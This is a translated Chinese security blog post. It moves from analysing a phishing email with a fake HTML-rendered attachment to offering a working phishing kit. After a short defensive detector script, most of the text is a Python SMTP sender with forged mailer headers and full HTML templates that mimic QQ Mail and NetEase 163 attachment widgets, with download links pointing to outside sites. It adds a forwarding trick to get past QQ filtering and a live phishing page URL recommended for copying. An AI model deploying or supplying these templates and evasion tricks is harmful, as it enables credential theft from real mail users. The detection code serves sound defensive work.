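Phishing incident response
Downloading the attachment then brought up a forged login page:
At first I thought it was a stored XSS vulnerability in NetEase mail, and wondered whether I might pick up a bug while doing incident response.
Later analysis showed that the mail service supports sending HTML. The attachment download was not a real attachment at all but the rendered effect of HTML, and the download link redirected to the phishing site.
Hmm, this can be used for phishing from now on too.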
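For triage of a reported message like this one, the check below compares what the HTML body draws with what the MIME structure actually contains. It is an added example, not code from the original post; the marker names are taken from the two templates shown further down this page, and the sample messages and the host phish.example are constructed.

```python
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attribute names and ids used by the webmail attachment widgets in the two
# templates on this page; a sender-controlled HTML body has no reason to carry them.
WIDGET_ATTRS = {"downloadurl", "attid", "downloadfilename", "data-download"}
WIDGET_IDS = {"attachment", "attachmentcount"}
DOWNLOAD_LABELS = {"下载", "download"}

class WidgetScan(HTMLParser):
    def __init__(self):
        super().__init__()
        self.markers, self.download_hosts = set(), []
        self._href, self._text = None, []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # HTMLParser already lower-cases attribute names
        self.markers.update(WIDGET_ATTRS.intersection(attrs))
        if (attrs.get("id") or "").lower() in WIDGET_IDS:
            self.markers.add("id=" + attrs["id"].lower())
        if tag == "a":
            self._href, self._text = attrs.get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            host = urlparse(self._href).hostname  # None for javascript:/relative
            if "".join(self._text).strip().lower() in DOWNLOAD_LABELS and host:
                self.download_hosts.append(host)
            self._href = None

def analyze(raw: bytes) -> dict:
    """Flag a message whose HTML draws an attachment that no MIME part backs."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    real = [p.get_filename() for p in msg.walk() if p.get_filename()]
    scan, body = WidgetScan(), msg.get_body(preferencelist=("html",))
    if body is not None:
        scan.feed(body.get_content())
        scan.close()
    drawn = bool(scan.markers or scan.download_hosts)
    return {"real_attachments": real, "markers": sorted(scan.markers),
            "download_hosts": scan.download_hosts, "suspicious": drawn and not real}

def build_samples():
    """Constructed messages: a drawn (fake) attachment and a genuine one."""
    fake = EmailMessage()
    fake.set_content("text")
    fake.add_alternative(
        '<div id="attachment"><a href="javascript:;" attid="反馈意见.rar" '
        'downloadurl="/attach/download?mailid=X">预览</a> '
        '<a href="https://phish.example/login"><span>下载</span></a></div>',
        subtype="html")
    genuine = EmailMessage()
    genuine.set_content("see attached")
    genuine.add_attachment(b"Rar!", "application", "octet-stream", filename="report.rar")
    return bytes(fake), bytes(genuine)
```

The `download_hosts` list is the useful pivot for response: it is where the drawn "download" button actually leads.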
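A new approach to email phishing
First, the screenshots:
QQ Mail:
NetEase 163 Mail:
The code: it has not been weaponized and is only a demo to verify the idea. Adapt it for your own use.
What to change: the username, password and msg["From"] parameters are the details of your sending mailbox
The msg["To"] parameter is the "fish" mailbox address
msg["Subject"] = Header("这是邮件主题", "GBK").encode() Design the mail subject yourself
with open('qqmail.txt','r+') as file: Line 31. If sending to a QQ user, use qqmail.txt; if sending to a 163 user, use 163mail.txt. Change it by hand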
'''
Author: AdminTony
Date: 2024-11-06 15:37:56
LastEditTime: 2024-11-06 17:23:44
LastEditors: AdminTony
'''
import smtplib
import base64
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.header import Header
# Mail configuration
smtp_server = "smtp.126.com" # Outgoing mail server (for example 126 mail)
smtp_port = 465 # Port 465 is normally used for SSL-encrypted connections
username = "admin@126.com" # Your mailbox address
password = "nidemima" # Your mailbox SMTP service password (some providers require a separately generated authorization code)
# Build the message
msg = MIMEMultipart("alternative")
msg["From"] = "admin@126.com"
msg["To"] = "admin@qq.com"
msg["Subject"] = Header("这是邮件主题", "GBK").encode() # Set the subject and encode it as GBK
# Add custom header fields
msg["X-Priority"] = "3"
msg["X-Mailer"] = "Coremail Webmail Server"
msg["X-Originating-IP"] = "[114.36.36.164]"
with open('qqmail.txt','r+') as file:
    html_content = file.read()
text_content = "文本内容"
# html_content = "<div>这是测试邮件的HTML内容。</div>"
# Base64-encode the mail content
print(html_content)
text_part = MIMEText(base64.b64encode(text_content.encode("GBK")).decode(), "plain", "GBK")
html_part = MIMEText(html_content.encode("GBK"), "html", "GBK")
# Attach the content to the message
msg.attach(text_part)
msg.attach(html_part)
# Send the message
try:
    with smtplib.SMTP_SSL(smtp_server, smtp_port) as server:
        server.login(username, password)
        server.sendmail(username, msg["To"], msg.as_string())
    print("邮件发送成功!")
except Exception as e:
    print("邮件发送失败:", e)
Contents of qqmail.txt:
<div id="isForwardContent">
<br>
<a data-auto-link="1" href=""></a>
<br>
<br>
<a data-auto-link="1" href=""></a>
<br>
<br>
<div data-ntes="ntes_mail_body_root" style="line-height:1.7;color:#000000;font-size:14px;font-family:Arial">
<p>
<br>
</p>
</div>
</div>
<div id="attachment" a="" b="false" style="padding:2px;" class="attbg" ui-type="attCon">
<div style="padding:6px 10px 10px 8px;" class="txt_left">
<div style="height:14px;">
<!--<a class="right" style="padding-top:1px;" href="javascript:;" ck="previewAttach" select=""><img lay-src="https://rescdn.qqmail.com/zh_CN/htmledition/images/spacer1e9c5d.gif" class="ico_preview" />附件预览</a> -->
<b style="font-size:14px;">
<img lay-src="https://rescdn.qqmail.com/zh_CN/htmledition/images/spacer1e9c5d.gif" align="absmiddle" class="ico_att showattch" border="0" style="margin:-3px 2px 0 0;">附件</b>(<span id="attachmentCount">1</span> 个)
<!-- -->
</div>
</div>
<div style="padding:0 8px 6px 12px;background:#fff;_height:60px;line-height:140%;">
<div class="graytext clear" style="padding-top:12px; padding-bottom:5px">
<span style="color:#000;font-weight:bold;font-size:12px;">普通附件</span>
<span id="span_ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb_safe"> (<span class="ico_Avira"></span>已通过电脑管家云查杀引擎扫描)</span>
<script type="text/javascript">
getTop().LogKV({ sValue: 'readmail|attachment|safebar|show', vSample: 0.01 })
</script>
</div>
<div class="att_bt attachitem">
<div class="ico_big">
<a id="AttachIconAZL0006_b5DNJ6qMsQUuY2cAgiBmEeb0" attach="1" attid="反馈意见.rar" viewmode="compress" downloadurl="/attach/download?mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&fileid=ZF0006_b5DNJ6qMsQUuY2cAxy1mZeb&name=%E5%8F%8D%E9%A6%88%E6%84%8F%E8%A7%81.rar" mailid="ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb" url="/cgi-bin/viewcompress?sid=F_jSUt-A9kJpExdw&cpsfile=%B7%B4%C0%A1%D2%E2%BC%FB.rar&mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&action=list&t=cps.json&fromattach=1" ck="previewAttach2" downloadfilename="57548d160f4158c365d1a227fe43df0a" idx="0" filename="反馈意见.rar" down="/cgi-bin/download?mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&filename=%B7%B4%C0%A1%D2%E2%BC%FB.rar&sid=F_jSUt-A9kJpExdw" iconurl="/zh_CN/htmledition/images/xdisk/ico_mid/fu_rar.gif" filebyte="45584825" sparse2onlinedocurl="">
<img style="width:auto;" lay-src="/zh_CN/htmledition/images/xdisk/ico_mid/fu_rar.gif">
</a>
</div>
<div class="name_big">
<span player="/cgi-bin/download?mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&filename=%B7%B4%C0%A1%D2%E2%BC%FB.rar&sid=F_jSUt-A9kJpExdw">反馈意见.rar</span>
<span class="graytext"> (43.47M<span id="span_attachIndex_ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb_ebc3798a5b667ed2c386923c34176c67" style="display:none">, <span style="color: #C00;">附件包含病毒,请勿下载打开
<input type="button" class="qm_conversation_input_info" mor="showPoisonWaring" mot="hidePoisonWaring" style="cursor:pointer;vertical-align:-4px;">
</span>
</span>)</span>
<div class="down_big">
<a href="javascript:;" ck="previewAttach" downloadurl="/attach/download?mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&fileid=ZF0006_b5DNJ6qMsQUuY2cAxy1mZeb&name=%E5%8F%8D%E9%A6%88%E6%84%8F%E8%A7%81.rar" mailid="ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb" select="1" downloadfilename="57548d160f4158c365d1a227fe43df0a" sparse2onlinedocurl="" down="/cgi-bin/download?mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&filename=%B7%B4%C0%A1%D2%E2%BC%FB.rar&sid=F_jSUt-A9kJpExdw">预览</a> <a title="请直接点击或鼠标右键转下载工具打开,请不要拖拽到下载工具悬浮框中" href="https://www.admintony.com" test="" unset="true">下载</a> <a style="" href="javascript:;" flag="0" class="needSetFlag" attachkey="ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb|%B7%B4%C0%A1%D2%E2%BC%FB.rar|%B7%B4%C0%A1%D2%E2%BC%FB.rar|45584825" onclick="var dom=this;getTop().attachSetFlag('ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb|%B7%B4%C0%A1%D2%E2%BC%FB.rar|%B7%B4%C0%A1%D2%E2%BC%FB.rar|45584825',true,function(){getTop().attr(dom,'flag','1');getTop().show(dom,false);getTop().show(dom.nextSibling,true);})">
<span>收藏</span>
</a>
<span style="display:none;" class="graytext">
<span>已收藏, </span>
<a href="javascript:;" onclick="getTop().jumpToAttachFlag('ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb','%B7%B4%C0%A1%D2%E2%BC%FB.rar')">查看</a>
</span><!-- <a ui-type="netdiskBind" attid="ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb|ebc3798a5b667ed2c386923c34176c67|%B7%B4%C0%A1%D2%E2%BC%FB.rar" onclick="getTop().QMNetDisk.upload(this);" class="netdisk_hide"><span >转存</span><span class="bind_down_icon"></span></a> -->
<!-- TODO: translate -->
</div>
</div>
</div>
</div>
</div>
Contents of 163mail.txt:
<div id="isForwardContent"><br><a data-auto-link="1" href=""></a><br><br><a data-auto-link="1" href=""></a><br><br><div data-ntes="ntes_mail_body_root" style="line-height:1.7;color:#000000;font-size:14px;font-family:Arial"><p><br></p></div></div>
<style>
:root {
--color-theme-1: #F1F7FE;
--color-theme-2: #EDF3FF;
--color-theme-3: #B4CEFB;
--color-theme-4: #8FB1F9;
--color-theme-5: #6993F7;
--color-theme-6: #3370ff;
--color-theme-7: #2f54d1;
--color-theme-8: #1c39ac;
--color-theme-9: #0F2486;
--color-theme-10: #071762;
--color-grey9: #fff;
--color-grey8: #F5F6F7;
--color-grey7: #EFF1F5;
--color-grey6: #E3E5EC;
--color-grey5: #B7BCC7;
--color-grey4: #9095A2;
--color-grey3: #585E6D;
--color-grey2: #394051;
--color-grey1: #21293A;
--color-danger: #EC4444;
--color-warning: #F5891D;
--color-safe: #14B360;
--color-tips: #FFFCDD;
--color-info: #3370FF;
--font-size-footnote: 12px;
--font-size-primary: 14px;
--font-size-body: 16px;
--font-size-head: 20px;
--font-size-title: 28px;
--font-size-big-title: 28px;
--font-weight-semibold: 600;
--font-weight-bold: 500;
--font-weight-normal: 400;
--color-h5-theme-1: #F1F7FE;
--color-h5-theme-2: #EDF3FF;
--color-h5-theme-3: #B4CEFB;
--color-h5-theme-4: #8FB1F9;
--color-h5-theme-5: #6993F7;
--color-h5-theme-6: #3061F2;
--color-h5-theme-7: #2f54d1;
--color-h5-theme-8: #1c39ac;
--color-h5-theme-9: #0F2486;
--color-h5-theme-10: #071762;
--color-h5-grey9: #fff;
--color-h5-grey8: #F5F5F5;
--color-h5-grey7: #EBEBEB;
--color-h5-grey6: #DBDBDB;
--color-h5-grey5: #C0C0C4;
--color-h5-grey4: #89898C;
--color-h5-grey3: #4D4D4D;
--color-h5-grey2: #2C2C2E;
--color-h5-grey1: #21293A;
--color-h5-danger: #FC2D2D;
--color-h5-warning: #F5891D;
--color-h5-safe: #50CD50;
--color-h5-tips: #FFFCDD;
--color-h5-info: #1C83EB;
--font-size-h5-footnote: 13px;
--font-size-h5-primary: 14px;
--font-size-h5-body: 16px;
--font-size-h5-head: 17px;
--font-size-h5-title: 17px;
--font-size-h5-big-title: 20px;
--button-large-height: 40px;
--button-height: 32px;
--button-small-height: 28px;
--button-tiny-height: 24px;
--button-huge-height: 48px;
--button-huge-border-radius: 4px;
--buttonH5-large-font-size: 17px;
--buttonH5-middle-font-size: 14px;
--buttonH5-small-font-size: 12px;
--buttonH5-large-round-border-radius: 10px;
--buttonH5-middle-round-border-radius: 8px;
--buttonH5-small-round-border-radius: 8px;
--buttonH5-primary-bg: var(--color-h5-theme-6);
--buttonH5-primary-active-bg: var(--color-h5-theme-7);
--buttonH5-secondary-bg: var(--color-h5-grey8);
--buttonH5-secondary-active-bg: var(--color-h5-grey7);
--input-large-height: 40px;
--input-middle-height: 32px;
--input-small-height: 28px;
--inputH5-border-color: #E6E6E6;
--inputH5-placeholder-color: var(--color-h5-grey5);
--inputH5-show-plain-btn-color: #C1C1C1;
--inputH5-clear-btn-color: #C3C3C3;
--inputH5-disabled-color: var(--color-h5-grey5);
--inputH5-danger-border-color: red;
--inputH5-border-background: none;
--inputH5-border-border-color: var(--color-h5-grey6);
--inputH5-border-disabled-border-color: var(--color-h5-grey6)
}
.lY0 {
font-size: 12px;
line-height: 1.666;
font-family: Microsoft Yahei, verdana;
color: #21293a;
outline: none;
padding: 10px;
background: -webkit-gradient(linear, 0 0, 0 100%, color-stop(0, #fff), color-stop(1, RGBA(255, 255, 255, 0)));
}
.sz0 {
font-size: 12px;
line-height: 1.666;
font-family: Microsoft Yahei, verdana;
color: #21293a;
outline: none;
border-style: solid;
border-width: 1px;
background: #f5f7fa;
border-radius: 2px;
border-color: #f5f7fa;
}
.tn0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
outline: none;
line-height: normal;
}
.sa0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
outline: none;
padding: 10px 10px 0;
position: relative;
}
.ox0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
outline: none;
}
.nui-ico-bigAtt {
color: #21293a;
display: inline-block;
vertical-align: middle;
font-family: nui !important;
font-size: 12px;
font-style: normal;
line-height: normal !important;
-webkit-font-smoothing: antialiased;
font-weight: 400;
overflow: hidden;
text-align: center;
background: url(/cover?u=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) no-repeat;
height: 14px !important;
width: 14px !important;
margin-top: -5px;
}
.jU0 {
font-family: Microsoft Yahei, verdana;
color: #21293a;
font-size: 14px;
line-height: 1.1;
margin-left: 4px;
}
.nui-txt-s12 {
font-family: Microsoft Yahei, verdana;
line-height: 1.1;
outline: none;
font-size: 12px !important;
color: #9095a2 !important;
font-weight: normal;
}
.sK0 {
font-family: Microsoft Yahei, verdana;
outline: none;
border-style: solid;
border-width: 0 0 1px;
clear: both;
font-size: 0;
height: 0;
line-height: 0;
overflow: hidden;
color: #e3e5ec;
margin-top: 10px;
}
.rY0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
outline: none;
position: relative;
zoom: 1;
padding: 0 10px;
}
.qs0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
margin: 0;
outline: none;
padding: 0;
list-style: none;
margin-left: 7px;
}
.lh0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
list-style: none;
outline: none;
padding: 0;
border-radius: 3px;
display: inline-block;
height: auto;
margin: 6px 40px 6px 0;
padding-top: 10px;
position: relative;
vertical-align: top;
width: 120px;
}
.lh0:hover {
background-color: #e9eff9;
border-color: #e9eff9;
}
.lh0:hover .ey0 {
display: block;
}
.dM1 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
list-style: none;
outline: none;
height: 4px;
left: 0;
position: absolute;
right: 0;
top: -4px;
}
.ey0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
list-style: none;
outline: none;
background: #fff;
border: 1px solid #e3e5ec;
border-radius: 4px;
bottom: 4px;
box-shadow: 0 4px 16px 0 rgba(0, 0, 0, .08);
color: #21293a;
display: none;
left: -1px;
line-height: normal;
padding: 4px 0;
position: absolute;
width: 258px;
z-index: 3;
}
.ey0 a:hover {
background: #edeeef
}
.dn0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
list-style: none;
color: #21293a;
line-height: normal;
outline: none;
padding: 4px 12px;
}
.cg0 {
font-family: Microsoft Yahei, verdana;
list-style: none;
outline: none;
white-space: normal;
word-break: break-all;
word-wrap: break-word;
color: #585e6d;
font-size: 12px;
line-height: 20px;
}
.gi2 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
list-style: none;
color: #21293a;
line-height: normal;
outline: none;
background: #e3e5ec;
height: 1px;
overflow: hidden;
}
.cK0 {
font-family: Microsoft Yahei, verdana;
list-style: none;
text-decoration: none;
color: #21293a;
display: block;
font-size: 14px;
line-height: 22px;
padding: 5px 12px;
}
.cF2 {
font-family: Microsoft Yahei, verdana;
list-style: none;
color: #21293a;
font-size: 14px;
line-height: 22px;
outline: none;
background: no-repeat 0 3px/16px 16px;
display: block;
padding-left: 28px;
background-image: url(/cover?u=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);
}
.cf2:hover {
background-color: #e9eff9;
border-color: #e9eff9;
}
.bJ0 {
font-family: Microsoft Yahei, verdana;
list-style: none;
text-decoration: none;
display: block;
font-size: 14px;
line-height: 22px;
padding: 5px 12px;
cursor: default;
opacity: .2;
color: #585e6d;
}
.cc2 {
font-family: Microsoft Yahei, verdana;
list-style: none;
font-size: 14px;
line-height: 22px;
cursor: default;
color: #585e6d;
outline: none;
background: no-repeat 0 3px/16px 16px;
display: block;
padding-left: 28px;
background-image: url(/cover?u=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);
}
.cb1 {
font-family: Microsoft Yahei, verdana;
list-style: none;
color: #21293a;
font-size: 14px;
line-height: 22px;
outline: none;
background: no-repeat 0 3px/16px 16px;
display: block;
padding-left: 28px;
background-image: url(/cover?u=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);
}
.v1 {
font-family: Microsoft Yahei, verdana;
list-style: none;
outline: none;
color: #585e6d;
float: right;
font-size: 12px;
line-height: 20px;
padding-top: 1px;
}
.v2 {
font-family: Microsoft Yahei, verdana;
list-style: none;
outline: none;
color: #9095a2;
display: block;
font-size: 12px;
line-height: 20px;
}
.eG0 {
color: #21293a;
list-style: none;
font-family: inherit;
border-collapse: collapse;
border-spacing: 0;
margin: 0;
outline: none;
border: 0;
font-size: 0;
line-height: 0;
padding: 0;
text-align: center;
width: 100px;
height: 100px;
vertical-align: middle;
}
.cf0 {
color: #21293a;
list-style: none;
font-family: inherit;
border-collapse: collapse;
border-spacing: 0;
font-size: 0;
line-height: 0;
text-align: center;
outline: none;
max-height: 100px;
overflow: hidden;
width: 100px;
}
.nui-ico-file75-6 {
color: #21293a;
list-style: none;
border-collapse: collapse;
border-spacing: 0;
display: inline-block;
vertical-align: middle;
font-family: nui !important;
font-size: 12px;
font-style: normal;
line-height: normal !important;
-webkit-font-smoothing: antialiased;
font-weight: 400;
overflow: hidden;
text-align: center;
background-image: url(/cover?u=VzczRm1Tb0dabjJMVXYzeEwwL1pwODMvMGdrRjJaZ2VIWXZzVjZ0K2RUMWRwZVdaY21UQXo4TXVFbXNWWDIyc29pbHVWQTRiQkxwa3g5MlpjVEw0ajFLRDRLTFVxbjVsL3lqWTZtRFV4WWs9);
background-repeat: no-repeat;
height: 75px;
width: 75px;
background-position: -375px -144px;
}
.gx0 {
color: #21293a;
line-height: normal;
list-style: none;
font-family: inherit;
font-size: 100%;
border-collapse: collapse;
border-spacing: 0;
margin: 0;
outline: none;
padding: 0;
border: 0;
height: auto;
vertical-align: top;
}
.dh0 {
line-height: normal;
list-style: none;
font-family: inherit;
font-size: 100%;
border-collapse: collapse;
border-spacing: 0;
font-weight: 400 !important;
overflow: hidden;
padding-top: 6px;
text-overflow: ellipsis;
white-space: nowrap;
display: block;
margin-bottom: 6px;
text-align: center;
width: 100px;
color: #21293a;
font-size: 12px;
}
.di0 {
line-height: normal;
list-style: none;
font-family: inherit;
font-size: 100%;
border-collapse: collapse;
border-spacing: 0;
outline: none;
display: block;
margin-bottom: 6px;
text-align: center;
width: 100px;
color: #9095a2 !important;
font-size: 12px;
}
.el0 {
color: #21293a;
list-style: none;
font-family: inherit;
font-size: 100%;
border-collapse: collapse;
border-spacing: 0;
outline: none;
line-height: 1.66;
padding-bottom: 6px;
text-align: center;
}
.cy0 {
list-style: none;
font-family: inherit;
font-size: 100%;
border-collapse: collapse;
border-spacing: 0;
line-height: 1.66;
text-align: center;
outline: none;
color: #9095a2 !important;
font-size: 12px;
}
.gh1 {
list-style: none;
font-family: inherit;
font-size: 100%;
border-collapse: collapse;
border-spacing: 0;
line-height: 1.66;
text-align: center;
outline: none;
padding: 8px 0 0;
color: #9095a2 !important;
}
.nui-split-cDark {
font-family: Microsoft Yahei, verdana;
outline: none;
border-style: solid;
border-width: 0 0 1px;
clear: both;
font-size: 0;
height: 0;
line-height: 0;
overflow: hidden;
color: #e3e5ec;
border-color: #e3e5ec;
margin-top: 10px;
}
.sw0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
outline: none;
line-height: normal;
padding: 8px;
zoom: 1;
}
.qB0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
outline: none;
}
.nf0 {
font-family: Microsoft Yahei, verdana;
color: #21293a;
outline: none;
vertical-align: middle;
border-radius: 3px;
font-size: 12px;
line-height: 1.666;
transition: all .5s;
zoom: 1;
background: #fff;
padding: 3px 8px;
height: auto;
display: block;
overflow: hidden;
padding-left: 0;
padding-right: 0;
position: relative;
box-shadow: none;
border: 1px solid #ebebeb;
}
.nui-ipt-placeholder {
font-family: Microsoft Yahei, verdana;
left: 9px;
position: absolute;
top: 0;
cursor: text;
font-size: 12px;
height: 90%;
line-height: 26px;
overflow: hidden;
color: #b7bcc7;
}
.nui-ipt-input {
font-family: Microsoft Yahei, verdana;
background: transparent;
border: none;
font-size: 12px;
margin: 0;
outline: none;
height: 10px;
overflow: hidden;
padding: 3px 10px;
resize: none;
width: 100%;
transition-duration: .5s;
transition-property: all;
}
.qG0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
outline: none;
padding-top: 8px;
position: relative;
display: none;
}
</style>
<div class="lY0">
<div class="sz0">
<div class="tn0" tabindex="0">
<div class="sa0">
<div class="ox0">
<b class="nui-ico-bigAtt">
</b>
<strong class="jU0">
超大附件
<span class="nui-txt-s12">
(1)
</span>
</strong>
<div class="sK0">
</div>
</div>
</div>
<div class="rY0">
<ul class="qs0">
<div>
<br>
</div>
<li class="lh0" tabindex="0">
<div class="dM1">
<div class="ey0">
<div class="dn0">
<div class="cg0">
反馈意见.rar
</div>
</div>
<div class="gi2">
</div>
<a href="https://www.baidu.com" class="cK0" target="_blank" onclick="getTop().handleDownload('/cgi-bin/download?mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&filename=%B7%B4%C0%A1%D2%E2%BC%FB.rar&sid=F_jSUt-A9kJpExdw', 'singleNormal', '_blank');" hidefocus="hidefocus">
<span class="cF2">
下载
</span>
</a>
<a class="bJ0" hidefocus="hidefocus">
<span class="cc2">
预览
</span>
</a>
<div class="gi2">
</div>
<a class="cK0" hidefocus="hidefocus" data-buy="未开通安全浏览功能">
<span class="cb1">
<span class="v1">
剩余次数:0次
</span>
安全浏览
<span class="v2">
该附件大小超过限制,仅支持检测
</span>
</span>
</a>
</div>
</div>
<table class="ntes_not_fresh_table">
<tbody>
<tr>
<td class="eG0">
<div class="cf0">
<b class="nui-ico-file75-6">
</b>
</div>
<br></td>
</tr>
<tr>
<td class="gx0">
<strong class="dh0">
反馈意见.rar
</strong>
<span class="di0">
43.47M
</span>
<div class="el0">
<span class="cy0">
(15天后到期)
</span>
<div class="gh1" data-download="https://mail.163.com/large-attachment-download/index.html?member=false">
</div>
</div>
</td>
</tr>
</tbody>
</table>
</li>
</ul>
</div>
<div class="nui-split-cDark">
</div>
</div>
</div>
</div></div></div></div><br></div></div></div><br></div></div></div><br></div></div></div><br></div></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br><br><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div>
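Note that sending directly to a QQ mailbox gets the message bounced:
Open it and forward the email
After that, QQ Mail no longer blocks it.
High-fidelity phishing page
http://merpeace.com/index.php You can all just copy it directly.
Clicking download pops up a login form, with the username filled in automatically from the account parameter:
After logging in with a "wrong" password (a correct one works too, of course),
the top-right corner shows that the login succeeded, and the file can then be downloaded.
Overall it is done with great attention to detail, and is worth a look for reference:
account may be left empty, but if it is supplied it is checked: it must be an address they have sent mail to, otherwise the page returns a 500
At login it checks whether the password is a weak password or an overlong string; if so, it simply reports a wrong password. Very realistic.
After logging in, the attachment can be downloaded. Very attentive to detail.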